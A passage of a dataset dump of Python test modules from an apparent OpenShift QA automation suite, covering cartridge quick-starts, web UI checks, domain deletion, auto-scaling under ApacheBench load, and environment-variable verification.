0.6417682766914368, "alphanum_fraction": 0.6417682766914368, "avg_line_length": 29.511627197265625, "blob_id": "10c5a6a9e6956fe2d264003a3750f5e6602485cd", "content_id": "ba8653a1f3ed9b835047dc000a8b23e90840f858", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1312, "license_type": "no_license", "max_line_length": 86, "num_lines": 43, "path": "/automation/open/testmodules/RT/quick_start/quick_start_dancer.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport common\nimport rhtest\n# user defined packages\nfrom quick_start_test import QuickStartTest\n\nclass QuickStartDancer(QuickStartTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self,config)\n self.config.application_type = common.app_types[\"perl\"]\n self.config.application_embedded_cartridges = [ ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: dancer\"\n self.config.git_upstream_url = \"git://github.com/openshift/dancer-example.git\"\n self.config.page = \"\" # means '/'\n self.config.page_pattern = \"Perl is dancing\"\n \n def pre_configuration_steps(self):\n self.log_info(\"Pre-onfiguring\")\n steps = [\n \"cd %s\" % self.config.application_name,\n \"rm -Rfv perl/\",\n \"git commit -a -m 'removing perl directory'\"\n ]\n ret_code = common.command_get_status(\" && \".join(steps))\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartDancer)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5955701470375061, "alphanum_fraction": 0.62428218126297, "avg_line_length": 20.36842155456543, "blob_id": "28bea4caa1d0f1fc3c0d2c15fb74c4486dfa8eea", "content_id": "f045f58c2500df26b3776e0653511b3d4d56f7c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1219, "license_type": "no_license", "max_line_length": 138, "num_lines": 57, "path": "/automation/open/testmodules/UI/web/case_135718.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_135718.py\n# Date: 2012/07/25 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Add_Invalid_Sshkey(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.login()\n \n #Change password\n web.go_to_account_page()\n web.input_by_id(\"key_raw_content\", \"ffffffff\")\n web.click_element_by_id(\"key_submit\")\n time.sleep(10)\n web.assert_text_equal_by_xpath('''Type is required and cannot be blank.''', '''//div[@id='key_raw_content_input']/div/p''') \n\n self.tearDown()\n\n return self.passed(\"Case 135718 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Add_Invalid_Sshkey)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_135718.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5938292741775513, "alphanum_fraction": 0.6001690626144409, "avg_line_length": 28.575000762939453, "blob_id": "30af5a4f0ea803d94aea21c7611d815d80f687ae", "content_id": "56dd9edfbe0feadafb99055fbccfb4f3839f6217", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2366, "license_type": "no_license", "max_line_length": 145, "num_lines": 80, "path": "/automation/open/testmodules/RT/client/destroy_domain_with_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\"\"\"\ntestcase id 129353\n\n\"\"\"\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\nlib_dir = os.path.join(testdir, \"lib\")\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n # check if there's a existing domain, create one if does not\n cf = self.config\n self.steps_list = []\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n\n self.info(\"Checking for existing domain...\")\n status, res = cf.rest_api.domain_get()\n if status == 'OK':\n self.domain_name = res\n status, res = cf.rest_api.app_list()\n if len(res) > 0:\n # found an existing app, we are good to go.\n self.app_name = res[0]['name']\n else:\n self.info(\"Creating an app...\")\n self.info(\"xxX\", 1)\n else:\n self.info(\"No domain found, creating an new one...\")\n self.info(\"xxx\", 1)\n\n def finalize(self):\n pass\n\n\nclass DestroyDomainWithApp(OpenShiftTest):\n def test_method(self, args=None, case_id=None):\n step = testcase.TestCaseStep(\"Try to delete a domain with exisiting app(s)\",\n \"rhc domain delete %s -l %s -p '%s' %s\"% (self.domain_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=\"!0\",\n )\n self.steps_list.append(step)\n\n case = testcase.TestCase(\"[US1653][RT][CLI] Try to destroy a domain with applications\",\n self.steps_list \n )\n \tcase.run()\n\tif case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(DestroyDomainWithApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6691842675209045, "alphanum_fraction": 0.6699395775794983, "avg_line_length": 31.292682647705078, "blob_id": "42d049e99fb20e38f94b9013712020e84b7acf9c", "content_id": "612e57c4f66da3e0c916c1cc96491e3a3c9ead3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1324, "license_type": "no_license", "max_line_length": 101, "num_lines": 41, "path": "/automation/open/testmodules/RT/quick_start/quick_start_sqlbuddy.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport common\nimport OSConf\nimport rhtest\nfrom quick_start_test import QuickStartTest\n\nclass QuickStartSqlbuddy(QuickStartTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"php\"]\n self.config.application_embedded_cartridges = [ common.cartridge_types[\"mysql\"] ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: SQLBuddy\"\n self.config.git_upstream_url = \"git://github.com/openshift/sqlbuddy-openshift-quickstart.git\"\n\n \n def verification(self):\n self.log_info(\"Verifying\")\n app_url = OSConf.get_app_url(self.config.application_name)\n res = common.grep_web_page(app_url+'/sqlbuddy/login.php', 'Username')\n res += common.grep_web_page(app_url+'/sqlbuddy/login.php', 'Help!')\n self.assert_equal(res, 0, \"All the patterns must be found\")\n \n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartSqlbuddy)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5539624691009521, "alphanum_fraction": 0.5643720030784607, "avg_line_length": 38.77734375, "blob_id": "2ad82de4c69dcf3fe16e918c5938c988fa256d31", "content_id": "cc6229d411719ce491204e240ce480726637571d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10183, "license_type": "no_license", "max_line_length": 210, "num_lines": 256, "path": "/automation/open/testmodules/RT/scaling/auto_scaling_test.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nJun 27, 2012\n[US2307][RT][rhc-cartridge]Auto scaling test\n\"\"\"\nimport common, testcase, OSConf\nimport rhtest\nimport subprocess, commands\nimport re\nimport os\nimport time\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\ncode_dict = { \"jbosseap\" : r\"\"\"<%@ page session=\"false\" %>\n<%@ page contentType=\"text/html\" language=\"java\" %>\n<%@ page import=\"javax.naming.*\" %>\n<%@ page import=\"java.io.*\" %>\n<%@ page import=\"java.util.*\" %>\n<%@ page import=\"java.text.*\" %>\n<%\nMap map = System.getenv();\nout.print(\"App DNS \" + map.get(\"OPENSHIFT_GEAR_DNS\"));\n%>\n\"\"\",\n \"php\" : r\"\"\"<html>\n<body>\n<?php\n$OPENSHIFT_GEAR_DNS = getenv(\"OPENSHIFT_GEAR_DNS\");\n echo \"App DNS \".$OPENSHIFT_GEAR_DNS .\"<br />\";\n?>\n</body>\n</html>\"\"\",\n \"perl\" : r\"\"\"#!/usr/bin/perl\nprint \"Content-type: text/html\\r\\n\\r\\n\";\nprint \"App DNS \".$ENV{\"OPENSHIFT_GEAR_DNS\"};\"\"\",\n \"ruby\" : r\"\"\"require \"thread-dump\"\nmap \"/health\" do\n health = proc do |env|\n [200, { \"Content-Type\" => \"text/html\" }, [\"1\"]]\n end\n run health\nend\nmap \"/\" do\n welcome = proc do |env|\n [200, { \"Content-Type\" => \"text/plain\" }, [\"App DNS \" + ENV[\"OPENSHIFT_GEAR_DNS\"]]]\n end\n run welcome\nend\"\"\",\n \"python\" : r\"\"\"#!/usr/bin/python\nimport os\nvirtenv = os.environ[\"APPDIR\"] + \"/virtenv/\"\nos.environ[\"PYTHON_EGG_CACHE\"] = os.path.join(virtenv, \"lib/python2.6/site-packages\")\nvirtualenv = os.path.join(virtenv, \"bin/activate_this.py\")\ntry:\n execfile(virtualenv, dict(__file__=virtualenv))\nexcept IOError:\n pass\ndef application(environ, start_response):\n ctype = \"text/plain\"\n if environ[\"PATH_INFO\"] == \"/health\":\n response_body = \"1\"\n else:\n response_body = \"App DNS \" + os.environ[\"OPENSHIFT_GEAR_DNS\"]\n\n status = \"200 OK\"\n response_headers = [(\"Content-Type\", ctype), (\"Content-Length\", str(len(response_body)))]\n start_response(status, response_headers)\n return [response_body]\"\"\",\n \"nodejs\" : r\"\"\"#!/bin/env node\nvar express = require(\"express\");\nvar app = express.createServer();\napp.get(\"/health\", function(req, res){\n res.send(\"1\");\n});\napp.get(\"/\", function(req, res){\n res.send(\"App DNS \" + process.env.OPENSHIFT_GEAR_DNS, {\"Content-Type\": \"text/plain\"});\n});\nvar ipaddr = process.env.OPENSHIFT_INTERNAL_IP;\nvar port = process.env.OPENSHIFT_INTERNAL_PORT || 8080;\nif (typeof ipaddr === \"undefined\") {\n console.warn(\"No OPENSHIFT_INTERNAL_IP environment variable\");\n}\nfunction terminator(sig) {\n if (typeof sig === \"string\") {\n console.log(\"%s: Received %s - terminating Node server ...\",\n Date(Date.now()), sig);\n process.exit(1);\n }\n console.log(\"%s: Node server stopped.\", Date(Date.now()) );\n}\nprocess.on(\"exit\", function() { terminator(); });\n[\"SIGHUP\", \"SIGINT\", \"SIGQUIT\", \"SIGILL\", \"SIGTRAP\", \"SIGABRT\", \"SIGBUS\",\n \"SIGFPE\", \"SIGUSR1\", \"SIGSEGV\", \"SIGUSR2\", \"SIGPIPE\", \"SIGTERM\"\n].forEach(function(element, index, array) {\n process.on(element, function() { terminator(element); });\n});\napp.listen(port, ipaddr, function() {\n console.log(\"%s: Node server started on %s:%d ...\", Date(Date.now() ),\n ipaddr, port);\n});\n\"\"\",\n }\ncode_dict[\"jbossas\"] = code_dict[\"jbosseap\"]\ncode_dict[\"ruby-1.9\"] = code_dict[\"ruby\"]\ncode_dict[\"python-2.7\"] = code_dict[\"python\"]\ncode_dict[\"python-3.3\"] = code_dict[\"python\"]\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = ['DEV', 'INT', 'STG']\n\n def initialize(self):\n #check the presence of /usr/bin/ab command\n if not os.path.exists(\"/usr/bin/ab\"):\n raise rhtest.TestIncompleteError(\"Missing /usr/bin/ab file: (No httpd-tools package?))\")\n self.steps_list = []\n self.summary = \"[US2307][RT][rhc-cartridge]Auto scaling test\"\n try:\n self.test_variant = self.config.test_variant\n except:\n self.test_variant = \"jbosseap\"\n self.domain_name = common.get_domain_name()\n self.app_name = self.test_variant.split('-')[0] + \"auto\"\n self.app_type = common.app_types[self.test_variant]\n self.git_repo = self.app_name\n self.proc = None\n common.env_setup()\n\n def finalize(self):\n if self.proc.poll() == None:\n self.proc.kill()\n\n\nclass AutoScalingTest(OpenShiftTest):\n\n def trigger_autoscale(self):\n url = OSConf.get_app_url(self.app_name)\n if self.config.options.run_mode == 'DEV':\n #self.proc = subprocess.Popen([\"/usr/bin/ab\", \"-c 200\", \"-n 100000\", \"http://\" + url + \"/\"])\n self.proc = subprocess.Popen([\"/usr/bin/ab\", \"-c 50\", \"-t 60\", \"http://\" + url + \"/\"])\n else:\n #self.proc = subprocess.Popen([\"/usr/bin/ab\", \"-c 70\", \"-n 100000\", \"http://\" + url + \"/\"])\n self.proc = subprocess.Popen([\"/usr/bin/ab\", \"-c 50\", \"-n 60\", \"http://\" + url + \"/\"])\n\n def remove_dup(self, lst):\n if lst == []:\n return []\n lst.sort()\n result = []\n result.append(lst[0])\n for i in range(len(lst) - 1):\n if lst[i] != lst[i+1]:\n result.append(lst[i+1])\n return result\n \n def confirm_autoscale(self):\n url = OSConf.get_app_url(self.app_name)\n # check if all gears are available\n gear_lst = []\n cmd = \"curl -H 'Pragma: no-cache' -L '%s'\" % (url)\n for i in range(20):\n (ret, output) = common.command_getstatusoutput(cmd, quiet=True)\n if ret != 0:\n time.sleep(3)\n else:\n pattern = re.compile(r'(?<=App DNS ).+com', re.M)\n match = pattern.search(output)\n if match == None:\n time.sleep(3)\n elif match.group(0) not in gear_lst:\n gear_lst.append(match.group(0))\n self.debug(\"Gears found: \" + ' '.join(gear_lst))\n if len(gear_lst) >= 2:\n return 0\n else:\n return 2\n\n def test_method(self):\n global code_dict\n # 1. Create app\n self.steps_list.append(testcase.TestCaseStep(\"Create an %s app: %s\" % (self.test_variant, self.app_name),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True, \"./\", True, \"small\", -1, False],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n # 2. Write some code to show the gear DNS\n file_path = { \"jbosseap\" : \"%s/src/main/webapp/index.jsp\" % (self.git_repo),\n \"jbossas\" : \"%s/src/main/webapp/index.jsp\" % (self.git_repo),\n \"php\" : \"%s/php/index.php\" % (self.git_repo),\n \"perl\" : \"%s/perl/index.pl\" % (self.git_repo),\n \"python\" : \"%s/wsgi/application\" % (self.git_repo),\n \"python-2.7\" : \"%s/wsgi/application\" % (self.git_repo),\n \"python-3.3\" : \"%s/wsgi/application\" % (self.git_repo),\n \"ruby\" : \"%s/config.ru\" % (self.git_repo),\n \"nodejs\" : \"%s/server.js\" % (self.git_repo),\n }\n cmd = \"rm -f %s/src/main/webapp/index.html ; echo '%s' > '%s'\" % (self.git_repo, code_dict[self.test_variant], file_path[self.test_variant])\n if self.test_variant in (\"jbossas\", \"jbosseap\"):\n cmd += \"\"\"; sed -i '/<system-properties>/ a\\\\\\n<property name=\"org.apache.catalina.session.StandardManager.MAX_ACTIVE_SESSIONS\" value=\"-1\"/>' %s/.openshift/config/standalone.xml\"\"\" % (self.git_repo)\n self.steps_list.append(testcase.TestCaseStep(\"Write some code to show the gear DNS\",\n cmd,\n expect_description=\"the code should be written successfully\",\n expect_return=0))\n # 3. Git push all the changes\n self.steps_list.append(testcase.TestCaseStep(\"Git push all the changes\",\n \"cd %s && git add . && git commit -amt && git push\" % (self.git_repo),\n expect_description=\"the changes should be git push successfully\",\n expect_return=0))\n # 4. Confirm the app is available\n self.steps_list.append(testcase.TestCaseStep(\"Confirm the app is available\",\n common.grep_web_page,\n function_parameters=[OSConf.get_app_url_X(self.app_name), r\"%s.*.com\" % (self.domain_name), \"-H 'Pragma: no-cache' -L\", 5, 4],\n #function_parameters=[OSConf.get_app_url_X(self.app_name), r\"\\w+-%s.*\\.com\" % (self.domain_name), \"-H 'Pragma: no-cache' -L\", 5, 4],\n expect_description=\"the app should be avaiable\",\n expect_return=0))\n # 5. Establish multiple parallel connections to the app to trigger auto-scaling\n self.steps_list.append(testcase.TestCaseStep(\"Establish multiple parallel connections to the app to trigger auto-scaling\",\n self.trigger_autoscale,\n expect_description=\"auto-scaling should be triggered\",\n ))\n # 6. Confirm auto-scaling is triggered\n self.steps_list.append(testcase.TestCaseStep(\"Confirm auto-scaling is triggered\",\n self.confirm_autoscale,\n expect_description=\"auto-scaling should be triggered\",\n try_count=60,\n try_interval=10,\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AutoScalingTest)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.606776773929596, "alphanum_fraction": 0.6134206652641296, "avg_line_length": 49.406700134277344, "blob_id": "8bfdddff83bdd323cb7fbc7d5a8a50f5caff140d", "content_id": "eab4e21e0efa4321ceff15720b8574cb21bac892", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10536, "license_type": "no_license", "max_line_length": 478, "num_lines": 209, "path": "/automation/open/testmodules/RT/cartridge/env_vars.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n\n[US650][Runtime][rhc-cartridge]Environment Variables\nhttps://tcms.engineering.redhat.com/case/138802/\n\"\"\"\n\nimport os,sys,re\nimport rhtest\n\nimport testcase\nimport common\nimport OSConf\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary = \"[US650][Runtime][rhc-cartridge]Environment Variables\"\n\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"WARN: Missing variant, used `php` as default\")\n self.test_variant = 'php'\n\n self.app_name = common.getRandomString(10)\n self.git_repo = \"./%s\" % (self.app_name)\n self.app_type = common.app_types[self.test_variant]\n\n common.env_setup()\n\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass EnvVars(OpenShiftTest):\n def test_method(self):\n # env vars should be found without mysql embedded\n env_lst = 'OPENSHIFT_LOG_DIR OPENSHIFT_APP_NAME OPENSHIFT_APP_UUID OPENSHIFT_TMP_DIR OPENSHIFT_HOMEDIR OPENSHIFT_REPO_DIR OPENSHIFT_GEAR_NAME OPENSHIFT_INTERNAL_PORT OPENSHIFT_RUN_DIR OPENSHIFT_INTERNAL_IP OPENSHIFT_GEAR_DIR OPENSHIFT_GEAR_TYPE OPENSHIFT_GEAR_DNS OPENSHIFT_DATA_DIR OPENSHIFT_GEAR_UUID'.split()\n # env vars should be found with mysql embedded\n env_mysql_lst = 'OPENSHIFT_DB_HOST OPENSHIFT_LOG_DIR OPENSHIFT_APP_NAME OPENSHIFT_APP_UUID OPENSHIFT_TMP_DIR OPENSHIFT_HOMEDIR OPENSHIFT_REPO_DIR OPENSHIFT_GEAR_NAME OPENSHIFT_INTERNAL_PORT OPENSHIFT_DB_PASSWORD OPENSHIFT_DB_USERNAME OPENSHIFT_RUN_DIR OPENSHIFT_INTERNAL_IP OPENSHIFT_GEAR_DIR OPENSHIFT_GEAR_TYPE OPENSHIFT_GEAR_DNS OPENSHIFT_DB_URL OPENSHIFT_DATA_DIR OPENSHIFT_GEAR_UUID OPENSHIFT_DB_TYPE OPENSHIFT_DB_PORT'.split()\n env_mongodb_lst = 'OPENSHIFT_NOSQL_DB_USERNAME OPENSHIFT_NOSQL_DB_TYPE OPENSHIFT_LOG_DIR OPENSHIFT_APP_NAME OPENSHIFT_APP_UUID OPENSHIFT_NOSQL_DB_URL OPENSHIFT_TMP_DIR OPENSHIFT_HOMEDIR OPENSHIFT_REPO_DIR OPENSHIFT_GEAR_NAME OPENSHIFT_INTERNAL_PORT OPENSHIFT_NOSQL_DB_PASSWORD OPENSHIFT_RUN_DIR OPENSHIFT_NOSQL_DB_PORT OPENSHIFT_INTERNAL_IP OPENSHIFT_GEAR_DIR OPENSHIFT_NOSQL_DB_HOST OPENSHIFT_GEAR_TYPE OPENSHIFT_GEAR_DNS OPENSHIFT_DATA_DIR OPENSHIFT_GEAR_UUID'.split()\n\n # 1. Create an app\n self.steps_list.append( testcase.TestCaseStep(\"1. Create an %s app\" % (self.test_variant),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n # 2. Append cmd 'env' into file '<repo_path>/.openshift/action_hooks/build'\n self.steps_list.append( testcase.TestCaseStep(\"2.Append cmd 'env' into file '<repo_path>/.openshift/action_hooks/build'\",\n \"echo '\\nenv' >> %s/.openshift/action_hooks/build\" % (self.git_repo),\n expect_description=\"Successfully added 1 line to .openshift/action_hooks/build\",\n expect_return=0))\n\n # 3.copy template to git repo and git push\n if self.test_variant == \"wsgi\":\n cmd = \"cd %s/wsgi && rm -f application && cp -f %s/app_template/env_var/python/application application && git add . && git commit -am t && git push\" % (self.git_repo, WORK_DIR)\n elif self.test_variant == \"php\":\n cmd = \"cd %s/php && rm -f index.php && cp -f %s/app_template/env_var/php/index.php index.php && git add . && git commit -am t && git push\" % (self.git_repo, WORK_DIR)\n elif self.test_variant == \"perl\":\n cmd = \"cd %s/perl && rm -f index.pl && cp %s/app_template/env_var/perl/index.pl index.pl && git add . && git commit -am t && git push\" % (self.git_repo, WORK_DIR)\n elif self.test_variant == \"rack\":\n cmd = \"cd %s && rm -f config.ru && cp %s/app_template/env_var/ruby/config.ru config.ru && git add . && git commit -am t && git push\" % (self.git_repo, WORK_DIR)\n elif self.test_variant == \"nodejs\":\n cmd = \"cd %s && rm -f server.js && cp %s/app_template/env_var/nodejs/server.js server.js && git add . && git commit -am t && git push\" % (self.git_repo, WORK_DIR)\n elif self.test_variant == \"jbossas\" or self.test_variant == \"diy\":\n cmd = \"cd %s && touch testfile && git add . && git commit -am t && git push\" % (self.git_repo)\n\n self.steps_list.append(testcase.TestCaseStep(\n \"3.copy template to git repo and git push\",\n cmd,\n output_callback = self.store_output,\n expect_description=\"Successfully copy template to git repo and git push\",\n expect_return=0))\n\n # 4.Check env vars from the output of git push\n self.steps_list.append(testcase.TestCaseStep(\n \"4.Check env vars from the output of git push\",\n self.compare,\n function_parameters=[self.get_last_output, env_lst],\n expect_description=\"The openshift env vars should found in the output of git push\",\n expect_return=True))\n\n if self.test_variant == \"jbossas\" or self.test_variant == \"diy\":\n self.info(\"%s app doesn't need to check the web page\" % (self.test_variant))\n else:\n # 5.Fetch the home page of the app\n\n # 6.Check env vars from the web page\n self.steps_list.append( testcase.TestCaseStep(\"6.Check env vars from the web page\",\n self.compare,\n function_parameters=[self.get_page, env_lst],\n expect_description=\"The openshift env vars should found in the web page\",\n expect_return=True))\n\n i = 7\n for (cart,lst) in ((\"mysql-5.1\",env_mysql_lst), (\"mongodb-2.2\",env_mongodb_lst)):\n # 7.Embed database to this app\n self.steps_list.append( testcase.TestCaseStep(\"%d.Embed %s to this app\" % (i,cart),\n common.embed,\n function_parameters=[self.app_name, \"add-\" + cart, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"%s should be embedded successfully\" % (cart),\n expect_return=0))\n\n # 8.Make some change and git push again\n self.steps_list.append( testcase.TestCaseStep(\"%d.Make some change and git push again\" % (i),\n \"cd %s && echo '\\n' >> .openshift/action_hooks/build && git add . && git commit -am t && git push\" % (self.git_repo),\n output_callback=self.store_output,\n expect_description=\"Git push should succeed\",\n expect_return=0))\n\n # 9.Check env vars from the output of git push after embedded database\n self.steps_list.append( testcase.TestCaseStep(\"%d.Check env vars from the output of git push after embedding %s\" % (i,cart),\n self.compare,\n function_parameters=[self.get_last_output, lst],\n expect_description=\"The openshift env vars should found in the output of git push\",\n expect_return=True))\n\n # 10.Fetch the home page of the app\n if self.test_variant == \"jbossas\" or self.test_variant == \"diy\":\n self.info(\"%s app doesn't need to check the web page\" % (self.test_variant))\n else:\n self.steps_list.append( testcase.TestCaseStep(\"%d.Fetch the home page of the app\" % (i),\n \"curl -s -H 'Pragma: no-cache' '%s'\",\n string_parameters = [OSConf.get_app_url_X(self.app_name)],\n expect_description=\"Successfully get the web page\",\n expect_return=0))\n # 11.Check env vars from the web page\n self.steps_list.append( testcase.TestCaseStep(\"%d.Check env vars from the web page\" % (i),\n self.compare,\n function_parameters=[self.get_last_output, lst],\n expect_description=\"The openshift env vars should found in the web page\",\n expect_return=True))\n # 12.Remove embedded database\n self.steps_list.append( testcase.TestCaseStep(\"%d.Remove embedded database\" % (i),\n common.embed,\n function_parameters=[self.app_name, \"remove-\" + cart, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"%s should be embedded successfully\" % (cart),\n expect_return=0))\n\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def contains(self, lst1, lst2):\n '''Check if ordered list lst1 contains ordered list lst2'''\n if len(lst1) < len(lst2):\n return False\n i = 0\n for j in range(0, len(lst2)):\n if i >= len(lst1):\n return False\n while i < len(lst1) and lst2[j] != lst1[i]:\n i += 1\n i += 1\n return True\n\n def compare(self, output, env_lst):\n pattern = re.compile(r'OPENSHIFT[\\w_]+(?=[=\\s])', re.S)\n match_lst = pattern.findall(output)\n match_lst.sort()\n env_lst.sort()\n print \"Environment variables found in the output/webpage:\"\n print match_lst\n print \"Environment variables should be found:\"\n print env_lst\n return self.contains(match_lst, env_lst)\n\n def get_last_output(self):\n return self.output\n\n def store_output(self, output):\n #self.info(\"Saving output...\\n%s\"%output)\n self.output=output\n return {}\n\n def get_page(self):\n #self.info(\"get_page()\")\n cmd=\"curl -s -H 'Pragma: no-cache' '%s'\"%OSConf.get_app_url(self.app_name)\n (status, output) = common.command_getstatusoutput(cmd)\n return output\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EnvVars)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6337325572967529, "alphanum_fraction": 0.6628172397613525, "avg_line_length": 71.29896545410156, "blob_id": "ccdcb59d60519f25ce75aeaaeb5685ace5e9d18e", "content_id": "634269b118d939631ad1e18b6935580649547b50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7014, "license_type": "no_license", "max_line_length": 674, "num_lines": 97, "path": "/automation/open/testmodules/UI/web/case_163038.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_163038.py\n# Date: 2012/07/25 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Check_jenkins_page(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.login()\n \n #Check cartridge page\n web.go_to_developer()\n time.sleep(5)\n web.click_element_by_link_text(\"Build with Jenkins\")\n time.sleep(5)\n web.assert_text_equal_by_xpath('''Build with Jenkins''', '''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.assert_text_equal_by_xpath('''Jenkins (https://wiki.jenkins-ci.org) is a full featured continuous integration (CI) server that can run builds, tests, and other scheduled tasks and integrate with your OpenShift applications.''', '''//div[@id='node-10295']/div/p''') \n web.click_element_by_link_text(\"https://wiki.jenkins-ci.org\") \n time.sleep(2)\n web.check_title(\"Home - Jenkins - Jenkins Wiki\")\n web.go_back()\n web.assert_text_equal_by_xpath('''With Jenkins, you have access to a full library of plugins (https://wiki.jenkins-ci.org/display/JENKINS/Plugins) and a vibrant, thriving community of users who have discovered a new way to do development. The basic work flow is:''', '''//div[@id='node-10295']/div/p[2]''')\n web.click_element_by_link_text(\"https://wiki.jenkins-ci.org/display/JENKINS/Plugins\")\n web.check_title(\"Plugins - Jenkins - Jenkins Wiki\")\n web.go_back() \n web.assert_text_equal_by_xpath('''Commit and push new code to your repo.''', '''//div[@id='node-10295']/div/ol/li''') \n web.assert_text_equal_by_xpath('''Jenkins waits for this commit, runs a full series of tests (customized by the developer)''', 